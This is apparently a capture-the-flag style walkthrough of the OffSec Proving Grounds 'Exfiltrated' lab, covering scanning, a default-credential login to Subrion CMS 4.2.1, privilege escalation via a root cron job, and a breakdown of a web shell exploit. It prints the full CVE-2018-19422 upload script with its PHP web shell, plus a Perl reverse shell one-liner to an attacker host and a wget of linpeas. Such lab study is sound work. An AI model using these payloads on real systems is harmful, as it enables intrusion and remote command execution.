The Summary

| Platform Site | OffSec Proving Grounds (Practice) |
| --- | --- |
| Hostname | exfiltrated |
| Domain | exfiltrated.offsec |
| Operating System / Architecture | Linux |
| Rating | Easy |

I am going to be attacking the Exfiltrated machine on OffSec Proving Grounds. This report covers scanning and service enumeration, leading to the initial foothold on the machine. Explanations of the foothold will be given. Privilege escalation will be obtained by manipulating an image and discovering a known vulnerability in an installed application.

It will be followed by a debrief, discussing what went right and wrong with breaking the machine and/or the process of creating the write-up.

The Attack

Scanning & Prelims

Once the testing environment is set up and full connectivity is confirmed, I run an nmap scan with the following command. After it is a list explaining the command, followed by the output of the scan.

NMAP Command

nmap -T4 -A -p- xx.xx.xx.xx -oA nmap-XXXXXXX --webxml

- nmap –> the application

- -T4 –> timing set to aggressive (4)

- -A -p- –> -A enables OS detection, version detection, script scanning and traceroute; -p- scans all 65535 TCP ports

- xx.xx.xx.xx –> target IP address

- -oA –> output All file types: normal, grepable, XML

- nmap-XXXXXXX –> name of the output files (XXXXXXX changes per tester's choice)

- --webxml –> references the stylesheet hosted on nmap.org, so the XML can be moved & viewed easily on another machine

Host is up (0.031s latency).

Not shown: 65533 closed tcp ports (reset)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 c1994b952225ed0f8520d363b448bbcf (RSA)

| 256 0f448badad95b8226af036ac19d00ef3 (ECDSA)

|_ 256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

| http-robots.txt: 7 disallowed entries

| /backup/ /cron/? /front/ /install/ /panel/ /tmp/

|_/updates/

|_http-title: Did not follow redirect to http://exfiltrated.offsec/

|_http-server-header: Apache/2.4.41 (Ubuntu)

No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

TCP/IP fingerprint:

OS:SCAN(V=7.93%E=4%D=4/30%OT=22%CT=1%CU=30563%PV=Y%DS=4%DC=T%G=Y%TM=66317CE

OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=2%ISR=10D%TI=Z%II=I%TS=A)OPS(O1=M

OS:551ST11NW7%O2=M551ST11NW7%O3=M551NNT11NW7%O4=M551ST11NW7%O5=M551ST11NW7%

OS:O6=M551ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%

OS:DF=Y%T=40%W=FAF0%O=M551NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=

OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)

OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=CD

OS:8F%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
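Since -oA also writes an XML file, the open ports can be pulled out of it programmatically for the notes. Below is a minimal sketch of that idea, not something I ran during the engagement. The sample XML is hand-written and heavily trimmed to the shape nmap produces, and the function name open_ports is my own.

```python
import xml.etree.ElementTree as ET

# Hand-written, trimmed sample in the shape of nmap's XML output (illustrative only).
SAMPLE_XML = """<nmaprun>
  <host>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.41"/>
      </port>
    </ports>
  </host>
</nmaprun>"""


def open_ports(xml_text):
    """Return (port, protocol, service, product/version) for every open port."""
    root = ET.fromstring(xml_text)
    results = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue  # skip closed or filtered ports
        service = port.find("service")
        name = service.get("name", "") if service is not None else ""
        product = service.get("product", "") if service is not None else ""
        version = service.get("version", "") if service is not None else ""
        banner = f"{product} {version}".strip()
        results.append((int(port.get("portid")), port.get("protocol"), name, banner))
    return results


for row in open_ports(SAMPLE_XML):
    print(row)
```

To use it against a real scan, read the .xml file written by -oA and pass its contents to open_ports.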

While scanning I set up notes for this machine. I also edit the /etc/hosts file in Kali to associate a domain of my choosing to the IP address provided by the Platform Site. The entry is often added to during testing when new domains are found.
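The hosts file edit is simple enough to do by hand, but here is a rough sketch of the logic in Python, working on the file's text rather than on /etc/hosts itself. The IP 192.0.2.10 and the second hostname are placeholders I made up for the example, and add_hosts_entry is a hypothetical helper.

```python
def add_hosts_entry(hosts_text, ip, hostname):
    """Return hosts-file text with hostname mapped to ip.

    If a line for the IP already exists, the hostname is appended to it,
    which mirrors adding newly found domains to the same entry.
    """
    lines = hosts_text.splitlines()
    for i, line in enumerate(lines):
        content, sep, comment = line.partition("#")
        fields = content.split()
        if fields and fields[0] == ip:
            if hostname not in fields[1:]:
                fields.append(hostname)
            rebuilt = " ".join(fields)
            if sep:
                rebuilt += " #" + comment  # keep any trailing comment
            lines[i] = rebuilt
            return "\n".join(lines) + "\n"
    lines.append(f"{ip} {hostname}")
    return "\n".join(lines) + "\n"


hosts = "127.0.0.1 localhost\n"
hosts = add_hosts_entry(hosts, "192.0.2.10", "exfiltrated.offsec")
hosts = add_hosts_entry(hosts, "192.0.2.10", "panel.exfiltrated.offsec")  # hypothetical extra domain
print(hosts)
```

Writing the result back to /etc/hosts needs root, so in practice I would still paste the line in with a text editor under sudo.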

Service Enumeration

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 3072 c1994b952225ed0f8520d363b448bbcf (RSA)

| 256 0f448badad95b8226af036ac19d00ef3 (ECDSA)

|_ 256 32e12a6ccc7ce63e23f4808d33ce9b3a (ED25519)

“It’s never SSH.” Well, almost never. It is best to try other services first.

80/tcp open http Apache httpd 2.4.41 ((Ubuntu))

| http-robots.txt: 7 disallowed entries

| /backup/ /cron/? /front/ /install/ /panel/ /tmp/

|_/updates/

|_http-title: Did not follow redirect to http://exfiltrated.offsec/

|_http-server-header: Apache/2.4.41 (Ubuntu)

Since the only other service is HTTP, it is almost a certainty that something is amiss with it.
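The robots.txt entries nmap reported are worth turning into a list of URLs to visit. A small sketch of how that could be done is below. The robots.txt text is reconstructed from the seven paths in the nmap output, so its exact layout on the server is an assumption, and disallowed_paths is my own helper name.

```python
# Reconstructed from the nmap http-robots.txt output; the real file's layout may differ.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /backup/
Disallow: /cron/?
Disallow: /front/
Disallow: /install/
Disallow: /panel/
Disallow: /tmp/
Disallow: /updates/
"""


def disallowed_paths(robots_text):
    """Collect the path of every non-empty Disallow rule."""
    paths = []
    for line in robots_text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        key, sep, value = line.partition(":")
        if sep and key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


base = "http://exfiltrated.offsec"
for path in disallowed_paths(SAMPLE_ROBOTS):
    print(base + path)
```

On this machine the /panel/ entry is the interesting one, since the exploit used later expects the panel URL.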



Going to the site, the homepage shows a login link.

Trying basic credentials of admin:admin brings success.

This provides access to the Admin Dashboard (through the gear icon).





The previous page mentions Subrion, and the admin dashboard confirms it. Scrolling to the bottom reveals a version number: Subrion CMS v4.2.1.

A search shows that Subrion CMS is a PHP/MySQL-based framework. The search also shows a public exploit is available. This can be copied from the Exploit-DB website. I like to grab them locally using searchsploit.

I like to make a copy of the exploit to the project directory for editing using the mirror flag (-m). Highlight the Path –> Copy (shift+ctrl+C) –> type: searchsploit -m –> Paste (shift+ctrl+V) –> execute (Enter).

This exploit requires access to the dashboard panel and valid credentials, both of which I have.

The Foothold



Upon opening the Python exploit file, I discovered it requires the BeautifulSoup module. This is not a standard module and will require installing for some people. Figured it may be good to show how to set up a virtual environment.

I like to set one up in each project folder when I am going to use Python. I like that it keeps the required modules for that specific project isolated to that project directory and it doesn’t affect the global install of Python. I’ve managed to ruin my global install of Python before, and this isolates any mistakes I may make. Another benefit is you can easily fire up older versions such as Python 2 for older scripts that were crafted in it and have not been updated.

Be sure you are working in your project directory and run the following commands.



virtualenv venv

This will create the virtual environment directory (called “venv”, but you can name it whatever you wish) in your working directory.

source venv/bin/activate

This executes the source command. The source command, a built-in feature of the shell, reads commands from a file and runs them directly in the current shell, without spawning anything new. After running it, you will “magically” see a change in the command line: the name of the virtualenv directory (venv) appears in the prompt. This indicates you are now working within that virtual environment. You can now traverse to any other directory and still remain in that venv environment.



You can close the virtual environment at any time by using: deactivate. And enter again using the source command.



Getting the exploit running will involve installing some Python modules into the virtual environment. This is done with: pip. To see what modules are installed, use: pip list



I’m not sure what the proper way to install these modules is. But I generally just run the script and it will throw an error, letting you know what modules it is asking for. I then install it with: pip install <moduleName>.

Keep running the script and installing modules until it runs properly. You can run pip list again to view what modules are installed in the virtual environment.
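An alternative to the run-and-fix loop is to check up front which of the script's imports are missing. The sketch below does that with the standard library. The list of names comes from the import lines at the top of the exploit, and missing_modules is a helper name I made up.

```python
import importlib.util


def missing_modules(names):
    """Return the top-level module names that cannot be found in this environment."""
    return [name for name in names if importlib.util.find_spec(name) is None]


# Top-level modules imported by the exploit script.
needed = ["requests", "time", "optparse", "random", "string", "bs4"]

for name in missing_modules(needed):
    print("missing:", name)
```

Note that the import name and the pip name do not always match: bs4 is installed with pip install beautifulsoup4.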



The script has a help option that shows a bit more on how to run the script, the syntax is: python exploit.py -u http://target/panel -l username -p password

We now have a shell. At this point, you can proceed to the privilege escalation section if you want to view the next stage of the attack. But I am going to continue to break this script down to better understand what is happening.

Script Breakdown

#!/usr/bin/python3

import requests

import time

import optparse

import random

import string

from bs4 import BeautifulSoup

parser = optparse.OptionParser()

parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")

parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")

parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")

options, args = parser.parse_args()

if not options.url:

print('[+] Specify an url target')

print('[+] Example usage: exploit.py -u http://target-uri/panel')

print('[+] Example help usage: exploit.py -h')

exit()

url_login = options.url

url_upload = options.url + 'uploads/read.json'

url_shell = options.url + 'uploads/'

username = options.user

password = options.passw

session = requests.Session()

def login():

global csrfToken

print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')

print('[+] Trying to connect to: ' + url_login)

try:

get_token_request = session.get(url_login)

soup = BeautifulSoup(get_token_request.text, 'html.parser')

csrfToken = soup.find('input',attrs = {'name':'__st'})['value']

print('[+] Success!')

time.sleep(1)

if csrfToken:

print(f"[+] Got CSRF token: {csrfToken}")

print("[+] Trying to log in...")

auth_url = url_login

auth_cookies = {"loader": "loaded"}

auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}

auth_data = {"__st": csrfToken, "username": username, "password": password}

auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)

if len(auth.text) <= 7000:

print('\n[x] Login failed... Check credentials')

exit()

else:

print('[+] Login Successful!\n')

else:

print('[x] Failed to got CSRF token')

exit()

except requests.exceptions.ConnectionError as err:

print('\n[x] Failed to Connect in: '+url_login+' ')

print('[x] This host seems to be Down')

exit()

return csrfToken

def name_rnd():

global shell_name

print('[+] Generating random name for Webshell...')

shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))

time.sleep(1)

print('[+] Generated webshell name: '+shell_name+'\n')

return shell_name

def shell_upload():

print('[+] Trying to Upload Webshell..')

try:

up_url = url_upload

up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}

up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}

up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"

session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)

except requests.exceptions.HTTPError as conn:

print('[x] Failed to Upload Webshell in: '+url_upload+' ')

exit()

def code_exec():

try:

url_clean = url_shell.replace('/panel', '')

req = session.get(url_clean + shell_name + '.phar?cmd=id')

if req.status_code == 200:

print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')

while True:

cmd = input('$ ')

x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')

print(x.text)

else:

print('\n[x] Webshell not found... upload seems to have failed')

except:

print('\n[x] Failed to execute PHP code...')

login()

name_rnd()

shell_upload()

code_exec()

Above is the entire public Python exploit script if you wish to scroll through or copy it. I will be breaking it down into sections with explanations of what is happening to give a better idea of how the script works.

import requests

import time

import optparse

import random

import string

from bs4 import BeautifulSoup

The script imports the following modules. This process is like gathering your tools for a project.

- requests –> makes HTTP requests

- time –> adding time delays to the script

- optparse –> parses command line options

- random and string –> generating random names

- BeautifulSoup –> parses HTML for extracting CSRF tokens

parser = optparse.OptionParser()

parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")

parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")

parser.add_option('-p', '--passw', action="store", dest="passw", help="Password credential to login")

options, args = parser.parse_args()

It displays “help” text to the screen when the -h flag is used. This section is responsible for that action.

parser.add_option –> defines the command-line options -u, -l, and -p for URL, username, and password.
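To see what the parser hands back, the same three options can be fed a list of arguments instead of the real command line. This is only a sketch for poking at optparse. The build_parser wrapper and the example values are mine, not part of the exploit.

```python
import optparse


def build_parser():
    """Recreate the exploit's three options so they can be tested in isolation."""
    parser = optparse.OptionParser()
    parser.add_option('-u', '--url', action="store", dest="url",
                      help="Base target uri http://target/panel")
    parser.add_option('-l', '--user', action="store", dest="user",
                      help="User credential to login")
    parser.add_option('-p', '--passw', action="store", dest="passw",
                      help="Password credential to login")
    return parser


# Passing a list to parse_args() stands in for sys.argv[1:].
options, args = build_parser().parse_args(
    ['-u', 'http://target/panel/', '-l', 'admin', '-p', 'admin'])
print(options.url, options.user, options.passw)

# Options that are not supplied default to None, which is what the
# "if not options.url" check in the script relies on.
empty, _ = build_parser().parse_args([])
print(empty.url)
```

The value after each flag lands on the attribute named by dest, so -l ends up as options.user and -p as options.passw.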

if not options.url:

print('[+] Specify an url target')

print('[+] Example usage: exploit.py -u http://target-uri/panel')

print('[+] Example help usage: exploit.py -h')

exit()

To attack the target, a URL must be entered by the user. This block ensures it is provided; otherwise, it prints usage examples and exits.

url_login = options.url

url_upload = options.url + 'uploads/read.json'

url_shell = options.url + 'uploads/'

username = options.user

password = options.passw

session = requests.Session()

It is now time to define some variables.

- url_login: URL for the login page.

- url_upload: URL for the upload endpoint.

- url_shell: base URL for accessing the uploaded shell.

- session: a session object to maintain headers and cookies across requests.
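One detail worth noticing is that the script builds these URLs by plain string concatenation, so the -u value needs a trailing slash. The sketch below shows the difference and one way to guard against it. build_urls is a hypothetical helper, not something in the exploit.

```python
def build_urls(base_url):
    """Build the three URLs the exploit uses, tolerating a missing trailing slash."""
    if not base_url.endswith('/'):
        base_url += '/'
    return {
        "login": base_url,
        "upload": base_url + 'uploads/read.json',
        "shell": base_url + 'uploads/',
    }


# What the script's own concatenation produces without the trailing slash:
print('http://target/panel' + 'uploads/read.json')

# With the guard in place, both forms give the same result:
print(build_urls('http://target/panel')["upload"])
print(build_urls('http://target/panel/')["upload"])
```

With the unmodified script, the simplest fix is to pass the URL as http://target/panel/ with the slash on the end.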

def login():

global csrfToken

print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')

print('[+] Trying to connect to: ' + url_login)

try:

get_token_request = session.get(url_login)

soup = BeautifulSoup(get_token_request.text, 'html.parser')

csrfToken = soup.find('input',attrs = {'name':'__st'})['value']

print('[+] Success!')

time.sleep(1)

if csrfToken:

print(f"[+] Got CSRF token: {csrfToken}")

print("[+] Trying to log in...")

auth_url = url_login

auth_cookies = {"loader": "loaded"}

auth_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/", "Upgrade-Insecure-Requests": "1"}

auth_data = {"__st": csrfToken, "username": username, "password": password}

auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)

if len(auth.text) <= 7000:

print('\n[x] Login failed... Check credentials')

exit()

else:

print('[+] Login Successful!\n')

else:

print('[x] Failed to got CSRF token')

exit()

except requests.exceptions.ConnectionError as err:

print('\n[x] Failed to Connect in: '+url_login+' ')

print('[x] This host seems to be Down')

exit()

return csrfToken

This block is a bit long, so the relevant text has been highlighted. It mainly deals with getting a CSRF token and attempting to log in.

- session.get(url_login): Sends a GET request to the login page to retrieve a CSRF token.

- BeautifulSoup(get_token_request.text, 'html.parser'): Parses the HTML response.

- soup.find('input', attrs={'name': '__st'})['value']: Extracts the CSRF token from the input field.

- auth_data –> injects the credentials into the request.

- session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data): Sends a POST request to log in with the CSRF token, username, and password.

- if len(auth.text) <= 7000: Checks login success. If the response body is 7000 characters or fewer, the script treats it as a failed login.
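The token extraction step can be tried offline against a scrap of HTML. The sketch below uses the standard library's html.parser as a stand-in for BeautifulSoup so it runs without extra installs. The sample login form is invented for the example, and the real page will contain far more markup.

```python
from html.parser import HTMLParser


class TokenFinder(HTMLParser):
    """Remember the value of the first <input> whose name matches field_name."""

    def __init__(self, field_name):
        super().__init__()
        self.field_name = field_name
        self.token = None

    def handle_starttag(self, tag, attrs):
        if tag != "input" or self.token is not None:
            return
        attributes = dict(attrs)
        if attributes.get("name") == self.field_name:
            self.token = attributes.get("value")


def find_token(html, field_name="__st"):
    """Return the hidden field's value, or None when the field is absent."""
    finder = TokenFinder(field_name)
    finder.feed(html)
    return finder.token


# Invented sample; only the __st field name comes from the exploit script.
SAMPLE_LOGIN_PAGE = (
    '<form method="post">'
    '<input type="hidden" name="__st" value="abc123">'
    '<input type="text" name="username">'
    '</form>'
)

print(find_token(SAMPLE_LOGIN_PAGE))
print(find_token("<p>no form here</p>"))
```

Returning None for a missing field matters: in the exploit, soup.find(...) returns None when the field is not there, and indexing it with ['value'] raises a TypeError, which the script's except clause for ConnectionError does not catch.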

def name_rnd():

global shell_name

print('[+] Generating random name for Webshell...')

shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))

time.sleep(1)

print('[+] Generated webshell name: '+shell_name+'\n')

return shell_name

This section generates a random name for the shell.

- shell_name –> creates a string of 15 random lowercase letters

- time.sleep –> instructs the script to sleep for one second
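The name generator is easy to pull out and run on its own. This is a small sketch of the same idea written as a function that returns its value rather than setting a global. The name random_name and the length parameter are my additions.

```python
import random
import string


def random_name(length=15):
    """Return a string of random lowercase ASCII letters, as the exploit does."""
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))


name = random_name()
print(name, len(name))
```

A random name mainly avoids clashing with files already in the uploads directory, which is handy when re-running the exploit.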

def shell_upload():

print('[+] Trying to Upload Webshell..')

try:

up_url = url_upload

up_cookies = {"INTELLI_06c8042c3d": "15ajqmku31n5e893djc8k8g7a0", "loader": "loaded"}

up_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------6159367931540763043609390275", "Origin": "http://192.168.1.20", "Connection": "close", "Referer": "http://192.168.1.20/panel/uploads/"}

up_data = "-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"reqid\"\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"__st\"\r\n\r\n"+csrfToken+"\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\""+shell_name+".phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php system($_GET['cmd']); ?>\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\"mtime[]\"\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n"

session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)

except requests.exceptions.HTTPError as conn:

print('[x] Failed to Upload Webshell in: '+url_upload+' ')



exit()- Line 80 – 83 –> creates cookies, headers and data to be uploaded in the request. This will be shown later when I proxy the exploit traffic through Burp Suite.

session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data): Sends a POST request to upload a web shell. Shell is a PHP file that executes system commands passed via thecmdparameter.
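The long up_data string is easier to read once you see how a multipart body is assembled. Below is a simplified sketch that builds one by hand. The field names come from the script, but the boundary, the token, the file name, the placeholder file content, and the multipart_body helper are all made up for illustration.

```python
def multipart_body(boundary, fields, file_field, filename, file_content):
    """Assemble a multipart/form-data body: plain fields first, then one file part."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\n'
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f'{value}\r\n'
        )
    parts.append(
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="{file_field}"; filename="{filename}"\r\n'
        f'Content-Type: application/octet-stream\r\n\r\n'
        f'{file_content}\r\n'
    )
    parts.append(f'--{boundary}--\r\n')  # closing delimiter
    return ''.join(parts)


body = multipart_body(
    "XBOUNDARY",                                   # made-up boundary
    {"cmd": "upload", "target": "l1_Lw", "__st": "token123"},
    "upload[]",
    "example.phar",                                # made-up file name
    "placeholder file content",
)
print(body)
```

Each part starts with two dashes followed by the boundary named in the Content-Type header, which is why the delimiter lines in up_data carry two more dashes than the boundary value in up_headers.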

def code_exec():

try:

url_clean = url_shell.replace('/panel', '')

req = session.get(url_clean + shell_name + '.phar?cmd=id')

if req.status_code == 200:

print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')

while True:

cmd = input('$ ')

x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')

print(x.text)

else:

print('\n[x] Webshell not found... upload seems to have failed')

except:

print('\n[x] Failed to execute PHP code...')

Executes the code via a web shell.

- (92) url_clean = url_shell.replace('/panel', '') –> modifies url_shell to remove the /panel part. This is necessary because the shell is accessed through a different path that doesn’t include /panel.

- (93) req = session.get(url_clean + shell_name + '.phar?cmd=id') –> requests the uploaded shell, which has the .phar extension. Appends ?cmd=id to the URL, which means it sends a GET request to the web shell with the command id (a Linux command which returns the user identity).

- (95) if req.status_code == 200 –> checks if the HTTP status code of the response is 200 (OK).

- (96) print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n') –> if the web shell is accessible, prints the URL path to the uploaded web shell.

- (97) while True: –> enters an infinite loop to continuously accept and execute commands.

- (98) cmd = input('$ ') –> prompts the user for a command to execute on the target server.

- (99) x = session.get(url_clean + shell_name + '.phar?cmd=' + cmd + '') –> constructs the URL with the user-provided command and sends a GET request to the web shell, passing the command as a query parameter (cmd=<command>).

- (100) print(x.text) –> prints the output of the executed command received in the response.
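Because the command is glued onto the URL as-is, I would expect commands containing characters such as & to be cut short, since the server reads & as the start of the next query parameter. The sketch below shows one possible tweak: percent-encoding the command before it goes into the URL. The shell_url helper is my own, and the host and file name are placeholders.

```python
from urllib.parse import quote


def shell_url(panel_url, shell_name, cmd):
    """Build the web shell URL the way code_exec() does, but with cmd percent-encoded."""
    url_clean = (panel_url + 'uploads/').replace('/panel', '')
    return url_clean + shell_name + '.phar?cmd=' + quote(cmd, safe='')


print(shell_url('http://target/panel/', 'examplename', 'id'))
print(shell_url('http://target/panel/', 'examplename', 'ls -la /tmp && id'))
```

This becomes relevant in the next stage, because reverse shell one-liners are full of quotes, semicolons and other special characters.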





Playing in Traffic

Now, let’s run the exploit while proxying the traffic through Burp Suite to give a clearer visual of the actions the script is taking.
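One way to get the script's traffic into Burp is to point the requests session at the proxy listener. The sketch below assumes Burp is listening on its default 127.0.0.1:8080, and proxy_settings is a hypothetical helper. It only builds the dictionary, so it runs without requests installed.

```python
def proxy_settings(host="127.0.0.1", port=8080):
    """Return a proxies mapping in the format the requests library expects."""
    proxy = f"http://{host}:{port}"
    return {"http": proxy, "https": proxy}


print(proxy_settings())

# In the exploit, this would be applied right after the session is created:
#   session = requests.Session()
#   session.proxies.update(proxy_settings())
```

Because every request in the script goes through the same session object, setting the proxy once covers the login, the upload, and each command sent to the web shell.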



A GET request is sent to exfiltrated.offsec/panel. Rendering the response shows it is the login page. Searching the response body for “__st”, which was stated in our script (Line 38), brings us to the CSRF token the script is seeking.

It then sends a POST request to the login URL containing the 3 required parameters in the request body: CSRF token (__st), username, and password. The rendered response shows the dashboard we were exploring earlier, indicating the login was successful.

The exploit script now sends a POST request to exfiltrated.offsec/panel/uploads/read.json. The multipart form data (Lines 81-83) can now be seen in the body. Going back to the terminal, we can see the random name that was given to our malicious file and find it in our request and response bodies.

A GET request is sent to exfiltrated.offsec/uploads/<maliciousFile.phar> with a query parameter carrying the command (id) that was hard-coded into the script. The rendered response shows that the command executed and gave the expected output.

Just something interesting I discovered: any command we type into our terminal shell shows its output in Burp as well. That makes sense, since each command is just another GET request to the web shell. It probably has nothing significant to do with anything, I just thought it was fun.

Privilege Escalation

Before getting into the Privilege Escalation, let’s get a better interactive shell. Revshells.com is a great resource of… well… reverse shells. Add the IP of your attack machine and the listening port. You can then browse through a series of shells and do a simple Copy & Paste.

A perl shell proves to be a winner.

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"xx.xx.xx.xx:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Start the netcat listener on port 4444, paste the command into the existing webshell and execute. Spawning a TTY shell is recommended. A good tutorial is here: zacheller.dev.



I want to run linpeas on this machine to give me some information on possible privilege escalation paths. I tend to put it into the /tmp directory to run, as it usually has the most open permissions, allowing linpeas to run without problems (mostly).

I will be using a wget command on the target and a Python HTTP server on the attack machine. Start a Python HTTP server on the attacker in the working directory of the linpeas file. The command python3 -m http.server 80 starts it on port 80. I like to add a more robust command to display my IP and file listings. It displays all the information needed for entering the wget command on the target.

ifconfig tun0 && ls && python3 -m http.server 80

On the target, enter the following wget command (altering where necessary).

wget http://xx.xx.xx.xx/linpeas.sh

Once copied over, modify the file’s permissions so it can be executed.

chmod +x linpeas.sh

# Confirm permissions changed

ls -la

Execute linpeas.sh



./linpeas.sh

Checking the linpeas output, we come upon a Cron job (no relation) that is running. Bash is running /opt/image-exif.sh every minute as root. If the process can be altered and made malicious, it will automatically fire and give us root access.

Generally, the presence of the five * characters (asterisks/stars/splats) is something you want to take note of. Each of the five columns is a unit of time (minute, hour, day of month, month, day of week), and a splat in a column means “every” value of that unit. Five splats therefore mean the job is executed every minute. Below is a handy little diagram to explain the splats.

┌───────────── minute (0–59)

│ ┌───────────── hour (0–23)

│ │ ┌───────────── day of the month (1–31)

│ │ │ ┌───────────── month (1–12)

│ │ │ │ ┌───────────── day of the week (0–6) (Sunday to Saturday;

│ │ │ │ │ 7 is also Sunday on some systems)

│ │ │ │ │

│ │ │ │ │



* * * * * <command to execute>Time to check out that file to see what it does. Change directory (cd) into /opt/, list files (ls), and view (cat) the image-exif.sh file.
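As a quick aside on the schedule itself, the five-field format is simple enough to check in a few lines of Python. The sketch below is deliberately simplified: it understands only *, single numbers, ranges and comma lists, ignores step values like */5, and does not reproduce cron's special handling when both day fields are restricted. The function names are my own.

```python
def field_matches(field, value):
    """True if one cron field ('*', 'n', 'a-b', or a comma list of those) matches value."""
    for part in field.split(','):
        if part == '*':
            return True
        low, sep, high = part.partition('-')
        if sep:
            if int(low) <= value <= int(high):
                return True
        elif int(part) == value:
            return True
    return False


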